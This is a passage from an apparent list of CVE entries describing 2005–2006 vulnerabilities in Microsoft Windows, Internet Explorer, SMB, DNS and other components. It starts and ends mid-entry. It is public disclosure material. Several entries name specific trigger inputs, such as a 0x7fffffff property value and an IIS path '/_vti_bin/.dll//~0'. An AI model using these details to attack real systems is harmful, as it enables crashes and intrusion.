(2) .png file that crashes MSN Messenger, and (3) .jpg file that crashes Internet Explorer. NOTE: another researcher has not been able to reproduce this issue. [CVE-2006-3992] Unspecified vulnerability in the Centrino (1) w22n50.sys, (2) w22n51.sys, (3) w29n50.sys, and (4) w29n51.sys Microsoft Windows drivers for Intel 2200BG and 2915ABG PRO/Wireless Network Connection before 10.5 with driver 9.0.4.16 allows remote attackers to execute arbitrary code via certain frames that trigger memory corruption. [CVE-2006-3944] Microsoft Internet Explorer 6 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) via a (1) Forms.ListBox.1 or (2) Forms.ListBox.1 object with the ListWidth property set to (a) 0x7fffffff, which triggers an integer overflow exception, or to (b) 0x7ffffffe, which triggers a null dereference. [CVE-2006-3943] Stack-based buffer overflow in NDFXArtEffects in Microsoft Internet Explorer 6 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) via long (1) RGBExtraColor, (2) RGBForeColor, and (3) RGBBackColor properties. [CVE-2006-3942] The server driver (srv.sys) in Microsoft Windows NT 4.0, 2000, XP, and Server 2003 allows remote attackers to cause a denial of service (system crash) via an SMB_COM_TRANSACTION SMB message that contains a string without null character termination, which leads to a NULL dereference in the ExecuteTransaction function, possibly related to an "SMB PIPE," aka the "Mailslot DOS" vulnerability. NOTE: the name "Mailslot DOS" was derived from incomplete initial research [CVE-2006-3915] Microsoft Internet Explorer 6 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) by iterating over any native function, as demonstrated with the window.alert function, which triggers a null dereference. [CVE-2006-3899] Microsoft Internet Explorer 6.0 on Windows XP SP2 allows remote attackers to cause a denial of service (application crash) by calling the stringToBinary function of the CEnroll.CEnroll.2 ActiveX object with a long second argument, which triggers an invalid memory access inside the SysAllocStringLen function. [CVE-2006-3898] Microsoft Internet Explorer 6.0 on Windows XP SP2 allows remote attackers to cause a denial of service (application crash) by calling the Click method of the Internet.HHCtrl.1 ActiveX object before initializing the URL, which triggers a null dereference. [CVE-2006-3897] Stack overflow in Microsoft Internet Explorer 6 on Windows 2000 allows remote attackers to cause a denial of service (application crash) by creating an NMSA.ASFSourceMediaDescription.1 ActiveX object with a long dispValue property. [CVE-2006-3880] DISPUTED Microsoft Windows NT 4.0, Windows 2000, Windows XP, and Windows Small Business Server 2003 allow remote attackers to cause a denial of service (IP stack hang) via a continuous stream of packets on TCP port 135 that have incorrect TCP header checksums and random numbers in certain TCP header fields, as demonstrated by the Achilles Windows Attack Tool. NOTE: the researcher reports that the Microsoft Security Response Center has stated "Our investigation which has included code review, review of the TCPDump, and attempts on reproing the issue on multiple fresh installs of various Windows Operating Systems have all resulted in non confirmation." [CVE-2006-3873] Heap-based buffer overflow in URLMON.DLL in Microsoft Internet Explorer 6 SP1 on Windows 2000 and XP SP1, with versions the MS06-042 patch before 20060912, allows remote attackers to cause a denial of service (crash) or execute arbitrary code via a long URL in a GZIP-encoded website that was the target of an HTTP redirect, due to an incomplete fix for CVE-2006-3869. [CVE-2006-3869] Heap-based buffer overflow in URLMON.DLL in Microsoft Internet Explorer 6 SP1 on Windows 2000 and XP SP1, with versions the MS06-042 patch before 20060824, allows remote attackers to cause a denial of service (crash) or execute arbitrary code via a long URL on a website that uses HTTP 1.1 compression. [CVE-2006-3730] Integer overflow in Microsoft Internet Explorer 6 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a 0x7fffffff argument to the setSlice method on a WebViewFolderIcon ActiveX object, which leads to an invalid memory copy. [CVE-2006-3648] Unspecified vulnerability in Microsoft Windows 2000 SP4, XP SP1 and SP2, Server 2003 and 2003 SP1, allows remote attackers to execute arbitrary code via unspecified vectors involving unhandled exceptions, memory resident applications, and incorrectly "unloading chained exception." [CVE-2006-3643] Cross-site scripting (XSS) vulnerability in Internet Explorer 5.01 and 6 in Microsoft Windows 2000 SP4 permits access to local "HTML-embedded resource files" in the Microsoft Management Console (MMC) library, which allows remote authenticated users to execute arbitrary commands, aka "MMC Redirect Cross-Site Scripting Vulnerability." [CVE-2006-3510] The Remote Data Service Object (RDS.DataControl) in Microsoft Internet Explorer 6 on Windows 2000 allows remote attackers to cause a denial of service (crash) via a series of operations that result in an invalid length calculation when using SysAllocStringLen, then triggers a buffer over-read. [CVE-2006-3471] Microsoft Internet Explorer 6 on Windows XP allows remote attackers to cause a denial of service (crash) via a table with a frameset as a child, which triggers a null dereference, as demonstrated using the appendChild method. [CVE-2006-3448] Buffer overflow in the Step-by-Step Interactive Training in Microsoft Windows 2000 SP4, XP SP2 and Professional, and Server 2003 SP1 allows remote attackers to execute arbitrary code via a long Syllabus string in crafted bookmark link files (cbo, cbl, or .cbm), a different issue than CVE-2005-1212. [CVE-2006-3445] Integer overflow in the ReadWideString function in agentdpv.dll in Microsoft Agent on Microsoft Windows 2000 SP4, XP SP2, and Server 2003 up to SP1 allows remote attackers to execute arbitrary code via a large length value in an .ACF file, which results in a heap-based buffer overflow. [CVE-2006-3444] Unspecified vulnerability in the kernel in Microsoft Windows 2000 SP4, probably a buffer overflow, allows local users to obtain privileges via unspecified vectors involving an "unchecked buffer." [CVE-2006-3443] Untrusted search path vulnerability in Winlogon in Microsoft Windows 2000 SP4, when SafeDllSearchMode is disabled, allows local users to gain privileges via a malicious DLL in the UserProfile directory, aka "User Profile Elevation of Privilege Vulnerability." [CVE-2006-3442] Unspecified vulnerability in Pragmatic General Multicast (PGM) in Microsoft Windows XP SP2 and earlier allows remote attackers to execute arbitrary code via a crafted multicast message. [CVE-2006-3441] Buffer overflow in the DNS Client service in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers to execute arbitrary code via a crafted record response. NOTE: while MS06-041 implies that there is a single issue, there are multiple vectors, and likely multiple vulnerabilities, related to (1) a heap-based buffer overflow in a DNS server response to the client, (2) a DNS server response with malformed ATMA records, and (3) a length miscalculation in TXT, HINFO, X25, and ISDN records. [CVE-2006-3440] Buffer overflow in the Winsock API in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers to execute arbitrary code via unknown vectors, aka "Winsock Hostname Vulnerability." [CVE-2006-3439] Buffer overflow in the Server Service in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers, including anonymous users, to execute arbitrary code via a crafted RPC message, a different vulnerability than CVE-2006-1314. [CVE-2006-3209] DISPUTED The Task scheduler (at.exe) on Microsoft Windows XP spawns each scheduled process with SYSTEM permissions, which allows local users to gain privileges. NOTE: this issue has been disputed by third parties, who state that the Task scheduler is limited to the Administrators group by default upon installation. [CVE-2006-2766] Buffer overflow in INETCOMM.DLL, as used in Microsoft Internet Explorer 6.0 through 6.0 SP2, Windows Explorer, Outlook Express 6, and possibly other programs, allows remote user-assisted attackers to cause a denial of service (application crash) via a long mhtml URI in the URL value in a URL file. [CVE-2006-2386] Unspecified vulnerability in Microsoft Outlook Express 6 and earlier allows remote attackers to execute arbitrary code via a crafted contact record in a Windows Address Book (WAB) file. [CVE-2006-2380] Microsoft Windows 2000 SP4 does not properly validate an RPC server during mutual authentication over SSL, which allows remote attackers to spoof an RPC server, aka the "RPC Mutual Authentication Vulnerability." [CVE-2006-2379] Buffer overflow in the TCP/IP Protocol driver in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 and earlier allows remote attackers to execute arbitrary code via unknown vectors related to IP source routing. [CVE-2006-2378] Buffer overflow in the ART Image Rendering component (jgdw400.dll) in Microsoft Windows XP SP1 and Sp2, Server 2003 SP1 and earlier, and Windows 98 and Me allows remote attackers to execute arbitrary code via a crafted ART image that causes heap corruption. [CVE-2006-2376] Integer overflow in the PolyPolygon function in Graphics Rendering Engine on Microsoft Windows 98 and Me allows remote attackers to execute arbitrary code via a Windows Metafile (WMF) or EMF image with a sum of entries in the vertext counts array and number of polygons that triggers a heap-based buffer overflow. [CVE-2006-2374] The Server Message Block (SMB) driver (MRXSMB.SYS) in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 and earlier allows local users to cause a denial of service (hang) by calling the MrxSmbCscIoctlCloseForCopyChunk with the file handle of the shadow device, which results in a deadlock, aka the "SMB Invalid Handle Vulnerability." [CVE-2006-2373] The Server Message Block (SMB) driver (MRXSMB.SYS) in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 and earlier allows local users to execute arbitrary code by calling the MrxSmbCscIoctlOpenForCopyChunk function with the METHOD_NEITHER method flag and an arbitrary address, possibly for kernel memory, aka the "SMB Driver Elevation of Privilege Vulnerability." [CVE-2006-2372] Buffer overflow in the DHCP Client service for Microsoft Windows 2000 SP4, Windows XP SP1 and SP2, and Server 2003 up to SP1 allows remote attackers to execute arbitrary code via a crafted DHCP response. [CVE-2006-2371] Buffer overflow in the Remote Access Connection Manager service (RASMAN) service in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 and earlier allows remote unauthenticated or authenticated attackers to execute arbitrary code via certain crafted "RPC related requests," that lead to registry corruption and stack corruption, aka the "RASMAN Registry Corruption Vulnerability." [CVE-2006-2370] Buffer overflow in the Routing and Remote Access service (RRAS) in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 and earlier allows remote unauthenticated or authenticated attackers to execute arbitrary code via certain crafted "RPC related requests," aka the "RRAS Memory Corruption Vulnerability." [CVE-2006-2334] The RtlDosPathNameToNtPathName_U API function in NTDLL.DLL in Microsoft Windows 2000 SP4 and XP SP2 does not properly convert DOS style paths with trailing spaces into NT style paths, which allows context-dependent attackers to create files that cannot be accessed through the expected DOS path or prevent access to other similarly named files in the same directory, which prevents those files from being detected or disinfected by certain anti-virus and anti-spyware software. [CVE-2006-2218] Unspecified vulnerability in Internet Explorer 6.0 on Microsoft Windows XP SP2 allows remote attackers to execute arbitrary code via "exceptional conditions" that trigger memory corruption, as demonstrated using an exception handler and nested object tags, a variant of CVE-2006-1992. [CVE-2006-2094] Microsoft Internet Explorer before Windows XP Service Pack 2 and Windows Server 2003 Service Pack 1, when Prompt is configured in Security Settings, uses modal dialogs to verify that a user wishes to run an ActiveX control or perform other risky actions, which allows user-assisted remote attackers to construct a race condition that tricks a user into clicking an object or pressing keys that are actually applied to a "Yes" approval for executing the control. [CVE-2006-2056] Argument injection vulnerability in Internet Explorer 6 for Windows XP SP2 allows user-assisted remote attackers to modify command line arguments to an invoked mail client via " (double quote) characters in a mailto: scheme handler, as demonstrated by launching Microsoft Outlook with an arbitrary filename as an attachment. NOTE: it is not clear whether this issue is implementation-specific or a problem in the Microsoft API. [CVE-2006-1654] Directory traversal vulnerability in the HP Color LaserJet 2500 Toolbox and Color LaserJet 4600 Toolbox on Microsoft Windows before 20060402 allows remote attackers to read arbitrary files via a .. (dot dot) in an HTTP GET request to TCP port 5225. [CVE-2006-1651] DISPUTED Microsoft ISA Server 2004 allows remote attackers to bypass certain filtering rules, including ones for (1) ICMP and (2) TCP, via IPv6 packets. NOTE: An established researcher has disputed this issue, saying that "Neither ISA Server 2004 nor Windows 2003 Basic Firewall support IPv6 filtering ... This is different network protocol." [CVE-2006-1591] Heap-based buffer overflow in Microsoft Windows Help winhlp32.exe allows user-assisted attackers to execute arbitrary code via crafted embedded image data in a .hlp file. [CVE-2006-1510] Buffer overflow in calloc.c in the Microsoft Windows XP SP2 ntdll.dll system library, when used by the ILDASM disassembler in the Microsoft .NET 1.0 and 1.1 SDK, might allow user-assisted attackers to execute arbitrary code via a crafted .dll file with a large static method. [CVE-2006-1476] Windows Firewall in Microsoft Windows XP SP2 produces incorrect application block alerts when the application filename is ".exe" (with no characters before the "."), which might allow local user-assisted users to trick a user into unblocking a Trojan horse program, as demonstrated by a malicious ".exe" program in a folder named "Internet Explorer," which triggers a question about whether to unblock the "Internet Explorer" program. [CVE-2006-1475] Windows Firewall in Microsoft Windows XP SP2 does not produce application alerts when an application is executed using the NTFS Alternate Data Streams (ADS) filename:stream syntax, which might allow local users to launch a Trojan horse attack in which the victim does not obtain the alert that Windows Firewall would have produced for a non-ADS file. [CVE-2006-1315] The Server Service (SRV.SYS driver) in Microsoft Windows 2000 SP4, XP SP1 and SP2, Server 2003 up to SP1, and other products, allows remote attackers to obtain sensitive information via crafted requests that leak information in SMB buffers, which are not properly initialized, aka "SMB Information Disclosure Vulnerability." [CVE-2006-1314] Heap-based buffer overflow in the Server Service (SRV.SYS driver) in Microsoft Windows 2000 SP4, XP SP1 and SP2, Server 2003 up to SP1, and other products, allows remote attackers to execute arbitrary code via crafted first-class Mailslot messages that triggers memory corruption and bypasses size restrictions on second-class Mailslot messages. [CVE-2006-1313] Microsoft JScript 5.1, 5.5, and 5.6 on Windows 2000 SP4, and 5.6 on Windows XP, Server 2003, Windows 98 and Windows Me, will "release objects early" in certain cases, which results in memory corruption and allows remote attackers to execute arbitrary code. [CVE-2006-1311] The RichEdit component in Microsoft Windows 2000 SP4, XP SP2, and 2003 SP1 [CVE-2006-1300] Microsoft .NET framework 2.0 (ASP.NET) in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 up to SP1 allows remote attackers to bypass access restrictions via unspecified "URL paths" that can access Application Folder objects "explicitly by name." [CVE-2006-1184] Microsoft Distributed Transaction Coordinator (MSDTC) for Windows NT 4.0, 2000 SP4, XP SP1 and SP2, and Server 2003 allows remote attackers to cause a denial of service (crash) via a BuildContextW request with a large (1) UuidString or (2) GuidIn of a certain length, which causes an out-of-range memory access, aka the MSDTC Denial of Service Vulnerability. NOTE: this is a variant of CVE-2005-2119. [CVE-2006-0988] The default configuration of the DNS Server service on Windows Server 2003 and Windows 2000, and the Microsoft DNS Server service on Windows NT 4.0, allows recursive queries and provides additional delegation information to arbitrary IP addresses, which allows remote attackers to cause a denial of service (traffic amplification) via DNS queries with spoofed source IP addresses. [CVE-2006-0753] Memory leak in Microsoft Internet Explorer 6 for Windows XP Service Pack 2 allows remote attackers to cause a denial of service (memory consumption) via JavaScript that uses setInterval to repeatedly call a function to set the value of window.status. [CVE-2006-0561] Cisco Secure Access Control Server (ACS) 3.x for Windows stores ACS administrator passwords and the master key in the registry with insecure permissions, which allows local users and remote administrators to decrypt the passwords by using Microsoft's cryptographic API functions to obtain the plaintext version of the master key. [CVE-2006-0143] Microsoft Windows Graphics Rendering Engine (GRE) allows remote attackers to corrupt memory and cause a denial of service (crash) via a WMF file containing (1) ExtCreateRegion or (2) ExtEscape function calls with arguments with inconsistent lengths. [CVE-2006-0034] Heap-based buffer overflow in the CRpcIoManagerServer::BuildContext function in msdtcprx.dll for Microsoft Distributed Transaction Coordinator (MSDTC) for Windows NT 4.0 and Windows 2000 SP2 and SP3 allows remote attackers to execute arbitrary code via a long fifth argument to the BuildContextW or BuildContext opcode, which triggers a bug in the NdrAllocate function, aka the MSDTC Invalid Memory Access Vulnerability. [CVE-2006-0032] Cross-site scripting (XSS) vulnerability in the Indexing Service in Microsoft Windows 2000, XP, and Server 2003, when the Encoding option is set to Auto Select, allows remote attackers to inject arbitrary web script or HTML via a UTF-7 encoded URL, which is injected into an error message whose charset is set to UTF-7. [CVE-2006-0025] Stack-based buffer overflow in Microsoft Windows Media Player 9 and 10 allows remote attackers to execute arbitrary code via a PNG image with a large chunk size. [CVE-2006-0023] Microsoft Windows XP SP1 and SP2 before August 2004, and possibly other operating systems and versions, uses insecure default ACLs that allow the Authenticated Users group to gain privileges by modifying critical configuration information for the (1) Simple Service Discovery Protocol (SSDP), (2) Universal Plug and Play Device Host (UPnP), (3) NetBT, (4) SCardSvr, (5) DHCP, and (6) DnsCache services, aka "Permissive Windows Services DACLs." NOTE: the NetBT, SCardSvr, DHCP, DnsCache already require privileged access to exploit. [CVE-2006-0021] Microsoft Windows XP SP1 and SP2, and Server 2003 up to SP1, allows remote attackers to cause a denial of service (hang) via an IGMP packet with an invalid IP option, aka the "IGMP v3 DoS Vulnerability." [CVE-2006-0020] An unspecified Microsoft WMF parsing application, as used in Internet Explorer 5.01 SP4 on Windows 2000 SP4, and 5.5 SP2 on Windows Millennium, and possibly other versions, allows attackers to cause a denial of service (crash) and possibly execute code via a crafted WMF file with a manipulated WMF header size, possibly involving an integer overflow, a different vulnerability than CVE-2005-4560, and aka "WMF Image Parsing Memory Corruption Vulnerability." [CVE-2006-0014] Buffer overflow in Microsoft Outlook Express 5.5 and 6 allows remote attackers to execute arbitrary code via a crafted Windows Address Book (WAB) file containing "certain Unicode strings" and modified length values. [CVE-2006-0013] Buffer overflow in the Web Client service (WebClnt.dll) for Microsoft Windows XP SP1 and SP2, and Server 2003 up to SP1, allows remote authenticated users or Guests to execute arbitrary code via crafted RPC requests, a different vulnerability than CVE-2005-1207. [CVE-2006-0012] Unspecified vulnerability in Windows Explorer in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers to execute arbitrary code via attack vectors involving COM objects and "crafted files and directories," aka the "Windows Shell Vulnerability." [CVE-2006-0010] Heap-based buffer overflow in T2EMBED.DLL in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 up to SP1, Windows 98, and Windows ME allows remote attackers to execute arbitrary code via an e-mail message or web page with a crafted Embedded Open Type (EOT) web font that triggers the overflow during decompression. [CVE-2006-0008] The ShellAbout API call in Korean Input Method Editor (IME) in Korean versions of Microsoft Windows XP SP1 and SP2, Windows Server 2003 up to SP1, and Office 2003, allows local users to gain privileges by launching the "shell about dialog box" and clicking the "End-User License Agreement" link, which executes Notepad with the privileges of the program that displays the about box. [CVE-2006-0006] Heap-based buffer overflow in the bitmap processing routine in Microsoft Windows Media Player 7.1 on Windows 2000 SP4, Media Player 9 on Windows 2000 SP4 and XP SP1, and Media Player 10 on XP SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted bitmap (.BMP) file that specifies a size of 0 but contains additional data. [CVE-2006-0005] Buffer overflow in the plug-in for Microsoft Windows Media Player (WMP) 9 and 10, when used in browsers other than Internet Explorer and set as the default application to handle media files, allows remote attackers to execute arbitrary code via HTML with an EMBED element containing a long src attribute. [CVE-2005-4717] Microsoft Internet Explorer 6.0 on Windows NT 4.0 SP6a, Windows 2000 SP4, Windows XP SP1, Windows XP SP2, and Windows Server 2003 SP1 allows remote attackers to cause a denial of service (client crash) via a certain combination of a malformed HTML file and a CSS file that triggers a null dereference, probably related to rendering of a DIV element that contains a malformed IMG tag, as demonstrated by IEcrash.htm and IEcrash.rar. [CVE-2005-4560] The Windows Graphical Device Interface library (GDI32.DLL) in Microsoft Windows allows remote attackers to execute arbitrary code via a Windows Metafile (WMF) format image with a crafted SETABORTPROC GDI Escape function call, related to the Windows Picture and Fax Viewer (SHIMGVW.DLL), a different vulnerability than CVE-2005-2123 and CVE-2005-2124, and as originally discovered in the wild on unionseek.com. [CVE-2005-4360] The URL parser in Microsoft Internet Information Services (IIS) 5.1 on Windows XP Professional SP2 allows remote attackers to execute arbitrary code via multiple requests to ".dll" followed by arguments such as "~0" through "~9", which causes ntdll.dll to produce a return value that is not correctly handled by IIS, as demonstrated using "/_vti_bin/.dll//~0". NOTE: the consequence was originally believed to be only a denial of service (application crash and reboot). [CVE-2005-4269] mshtml.dll in Microsoft Windows XP, Server 2003, and Internet Explorer 6.0 SP1 allows attackers to cause a denial of service (access violation) by causing mshtml.dll to process button-focus events at the same time that a document is reloading, as seen in Microsoft Office InfoPath 2003 by repeatedly clicking the "Delete" button in a repeating section in a form. NOTE: the normal operation of InfoPath appears to involve a local user without any privilege boundaries, so this might not be a vulnerability in InfoPath. If no realistic scenarios exist for this problem in other products, then perhaps it should be excluded from CVE. [CVE-2005-3981] * DISPUTED NOTE: this issue has been disputed by third parties. Microsoft Windows XP, 2000, and 2003 allows local users to kill a writable process by using the CreateRemoteThread function with certain arguments on a process that has been opened using the OpenProcess function, possibly involving an invalid address for the start routine. NOTE: followup posts have disputed this issue, saying that if a user already has privileges to write to a process, then other functions could be called or the process could be terminated using PROCESS_TERMINATE. [CVE-2005-3945] The SynAttackProtect protection in Microsoft Windows 2003 before SP1 and Windows 2000 before SP4 with Update Roll-up uses a hash of predictable data, which allows remote attackers to cause a denial of service (CPU consumption) via a flood of SYN packets that produce identical hash values, which slows down the hash table lookups. [CVE-2005-3644] PNP_GetDeviceList (upnp_getdevicelist) in UPnP for Microsoft Windows 2000 SP4 and earlier, and possibly Windows XP SP1 and earlier, allows remote attackers to cause a denial of service (memory consumption) via a DCE RPC request that specifies a large output buffer size, a variant of CVE-2006-6296, and a different vulnerability than CVE-2005-2120. [CVE-2005-3595] By default Microsoft Windows XP Home Edition installs with a blank password for the Administrator account, which allows remote attackers to gain control of the computer. [CVE-2005-3177] CHKDSK in Microsoft Windows 2000 before Update Rollup 1 for SP4, Windows XP, and Windows Server 2003, when running in fix mode, does not properly handle security descriptors if the master file table contains a large number of files or if the descriptors do not satisfy certain NTFS conventions, which could cause ACLs for some files to be reverted to less secure defaults, or cause security descriptors to be removed. [CVE-2005-3176] Microsoft Windows 2000 before Update Rollup 1 for SP4 does not record the IP address of a Windows Terminal Services client in a security log event if the client connects successfully, which could make it easier for attackers to escape detection. [CVE-2005-3175] Microsoft Windows 2000 before Update Rollup 1 for SP4 allows a local administrator to unlock a computer even if it has been locked by a domain administrator, which allows the local administrator to access the session as the domain administrator. [CVE-2005-3174] Microsoft Windows 2000 before Update Rollup 1 for SP4 allows users to log on to the domain, even when their password has expired, if the fully qualified domain name (FQDN) is 8 characters long. [CVE-2005-3173] Microsoft Windows 2000 before Update Rollup 1 for SP4 does not apply group policies if the user logs on using UPN credentials with a trailing dot, which prevents Windows 2000 from finding the correct domain controller and could allow the user to bypass intended restrictions. [CVE-2005-3172] The WideCharToMultiByte function in Microsoft Windows 2000 before Update Rollup 1 for SP4 does not properly convert strings with Japanese composite characters in the last character, which could prevent the string from being null terminated and lead to data corruption or enable buffer overflow attacks. [CVE-2005-3171] Microsoft Windows 2000 before Update Rollup 1 for SP4 records Event ID 1704 to indicate that Group Policy security settings were successfully updated, even when the processing fails such as when Ntuser.pol cannot be accessed, which could cause system administrators to believe that the system is compliant with the specified settings. [CVE-2005-3170] The LDAP client on Microsoft Windows 2000 before Update Rollup 1 for SP4 accepts certificates using LDAP Secure Sockets Layer (LDAPS) even when the Certificate Authority (CA) is not trusted, which could allow attackers to trick users into believing that they are accessing a trusted site. [CVE-2005-3169] Microsoft Windows 2000 before Update Rollup 1 for SP4, when the "audit directory service access" policy is enabled, does not record a 565 event message for File Delete Child operations on an Active Directory object in the security event log, which could allow attackers to conduct unauthorized activities without detection. [CVE-2005-3168] The SECEDIT command on Microsoft Windows 2000 before Update Rollup 1 for SP4, when using a security template to set Access Control Lists (ACLs) on folders, does not apply ACLs on folders that are listed after a long folder entry, which could result in less secure permissions than specified by the template. [CVE-2005-2940] Unquoted Windows search path vulnerability in Microsoft Antispyware 1.0.509 (Beta 1) might allow local users to gain privileges via a malicious "program.exe" file in the C: folder, involving the programs (1) GIANTAntiSpywareMain.exe, (2) gcASNotice.exe, (3) gcasServ.exe, (4) gcasSWUpdater.exe, or (5) GIANTAntiSpywareUpdater.exe. NOTE: it is not clear whether this overlaps CVE-2005-2935. [CVE-2005-2935] Unquoted Windows search path vulnerability in Microsoft AntiSpyware might allow local users to execute code via a malicious c:\program.exe file, which is run by AntiSpywareMain.exe when it attempts to execute gsasDtServ.exe. NOTE: it is not clear whether this overlaps CVE-2005-2940. [CVE-2005-2388] Buffer overflow in a certain USB driver, as used on Microsoft Windows, allows attackers to execute arbitrary code. [CVE-2005-2307] netman.dll in Microsoft Windows Connections Manager Library allows local users to cause a denial of service (Network Connections Service crash) via a large integer argument to a particular function, aka "Network Connection Manager Vulnerability." [CVE-2005-2128] QUARTZ.DLL in Microsoft Windows Media Player 9 allows remote attackers to write a null byte to arbitrary memory via an AVI file with a crafted strn element with a modified length value. [CVE-2005-2122] Windows Shell for Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 allows remote attackers to execute arbitrary commands via a shortcut (.lnk) file with long font properties that lead to a buffer overflow in the Client/Server Runtime Server Subsystem (CSRSS), a different vulnerability than CVE-2005-2118. [CVE-2005-2120] Stack-based buffer overflow in the Plug and Play (PnP) service (UMPNPMGR.DLL) in Microsoft Windows 2000 SP4, and XP SP1 and SP2, allows remote or local authenticated attackers to execute arbitrary code via a large number of "\" (backslash) characters in a registry key name, which triggers the overflow in a wsprintfW function call. [CVE-2005-2118] Windows Shell for Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 allows remote user-assisted attackers to execute arbitrary commands via a crafted shortcut (.lnk) file with long font properties that lead to a buffer overflow when the user views the file's properties using Windows Explorer, a different vulnerability than CVE-2005-2122. [CVE-2005-2117] Web View in Windows Explorer on Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 does not properly handle certain HTML characters in preview fields, which allows remote user-assisted attackers to execute arbitrary code. [CVE-2005-1987] Buffer overflow in Collaboration Data Objects (CDO), as used in Microsoft Windows and Microsoft Exchange Server, allows remote attackers to execute arbitrary code when CDOSYS or CDOEX processes an e-mail message with a large header name, as demonstrated using the "Content-Type" string. [CVE-2005-1985] The Client Service for NetWare (CSNW) on Microsoft Windows 2000 SP4, XP SP1 and Sp2, and Server 2003 SP1 and earlier, allows remote attackers to execute arbitrary code due to an "unchecked buffer" when processing certain crafted network messages. [CVE-2005-1984] Buffer overflow in the Print Spooler service (Spoolsv.exe) for Microsoft Windows 2000, Windows XP, and Windows Server 2003 allows remote attackers to execute arbitrary code via a malicious message. [CVE-2005-1983] Stack-based buffer overflow in the Plug and Play (PnP) service for Microsoft Windows 2000 and Windows XP Service Pack 1 allows remote attackers to execute arbitrary code via a crafted packet, and local users to gain privileges via a malicious application, as exploited by the Zotob (aka Mytob) worm. [CVE-2005-1982] Unknown vulnerability in the PKINIT Protocol for Microsoft Windows 2000, Windows XP, and Windows Server 2003 could allow a local user to obtain information and spoof a server via a man-in-the-middle (MITM) attack between a client and a domain controller when PKINIT smart card authentication is being used. [CVE-2005-1981] Unknown vulnerability in Microsoft Windows 2000 Server and Windows Server 2003 domain controllers allows remote authenticated users to cause a denial of service (system crash) via a crafted Kerberos message. [CVE-2005-1980] Distributed Transaction Controller in Microsoft Windows allows remote servers to cause a denial of service (MSDTC service hang) via a crafted Transaction Internet Protocol (TIP) message that causes DTC to repeatedly connect to a target IP and port number after an error occurs, aka the "Distributed TIP Vulnerability." [CVE-2005-1979] Distributed Transaction Controller in Microsoft Windows allows remote servers to cause a denial of service (MSDTC service exception and exit) via an "unexpected protocol command during the reconnection request," which is not properly handled by the Transaction Internet Protocol (TIP) functionality. [CVE-2005-1978] COM+ in Microsoft Windows does not properly "create and use memory structures," which allows local users or remote attackers to execute arbitrary code. [CVE-2005-1793] User32.DLL in Microsoft Windows 98SE, and possibly other operating systems, allows local and remote attackers to cause a denial of service (crash) via an icon (.ico) bitmap file with large width and height values. [CVE-2005-1219] Buffer overflow in the Microsoft Color Management Module for Windows allows remote attackers to execute arbitrary code via an image with crafted ICC profile format tags. [CVE-2005-1218] The Microsoft Windows kernel in Microsoft Windows 2000 Server, Windows XP, and Windows Server 2003 allows remote attackers to cause a denial of service (crash) via crafted Remote Desktop Protocol (RDP) requests. [CVE-2005-1208] Integer overflow in Microsoft Windows 98, 2000, XP SP2 and earlier, and Server 2003 SP1 and earlier allows remote attackers to execute arbitrary code via a crafted compiled Help (.CHM) file with a large size field that triggers a heap-based buffer overflow, as demonstrated using a "ms-its:" URL in Internet Explorer. [CVE-2005-1207] Buffer overflow in the Web Client service in Microsoft Windows XP and Windows Server 2003 allows remote authenticated users to execute arbitrary code via a crafted WebDAV request containing special parameters. [CVE-2005-1206] Buffer overflow in the Server Message Block (SMB) functionality for Microsoft Windows 2000, XP SP1 and SP2, and Server 2003 and SP1 allows remote attackers to execute arbitrary code via unknown vectors, aka the "Server Message Block Vulnerability." [CVE-2005-1205] The Telnet client for Microsoft Windows XP, Windows Server 2003, and Windows Services for UNIX allows remote attackers to read sensitive environment variables via the NEW-ENVIRON option with a SEND ENV_USERVAR command. [CVE-2005-0852] Microsoft Windows XP SP1 allows local users to cause a denial of service (system crash) via an empty datagram to a raw IP over IP socket (IP protocol 4), as originally demonstrated using code in Python 2.3. [CVE-2005-0551] Stack-based buffer overflow in WINSRV.DLL in the Client Server Runtime System (CSRSS) process of Microsoft Windows 2000, Windows XP SP1 and SP2, and Windows Server 2003 allows local users to gain privileges via a specially-designed application that provides console window information with a long FaceName value. [CVE-2005-0550] Buffer overflow in Microsoft Windows 2000, Windows XP SP1 and SP2, and Windows Server 2003 allows local users to cause a denial of service (i.e., system crash) via a malformed request, aka "Object Management Vulnerability". [CVE-2005-0545] Microsoft Windows XP Pro SP2 and Windows 2000 Server SP4 running Active Directory allow local users to bypass group policies that restrict access to hidden drives by using the browse feature in Office 10 applications such as Word or Excel, or using a flash drive. NOTE: this issue has been disputed in a followup post. [CVE-2005-0063] The document processing application used by the Windows Shell in Microsoft Windows 2000, Windows XP, and Windows Server 2003 allows remote attackers to execute arbitrary code by modifying the CLSID stored in a file so that it is processed by HTML Application Host (MSHTA), as demonstrated using a Microsoft Word document. [CVE-2005-0061] The kernel of Microsoft Windows 2000, Windows XP SP1 and SP2, and Windows Server 2003 allows local users to gain privileges via certain access requests. [CVE-2005-0060] Buffer overflow in the font processing component of Microsoft Windows 2000, Windows XP SP1 and SP2, and Windows Server 2003 allows local users to gain privileges via a specially-designed application. [CVE-2005-0059] Buffer overflow in the Message Queuing component of Microsoft Windows 2000 and Windows XP SP1 allows remote attackers to execute arbitrary code via a crafted message. [CVE-2005-0058] Buffer overflow in the Telephony Application Programming Interface (TAPI) for Microsoft Windows 98, Windows 98 SE, Windows ME, Windows 2000, Windows XP, and Windows Server 2003 allows attackers elevate privileges or execute arbitrary code via a 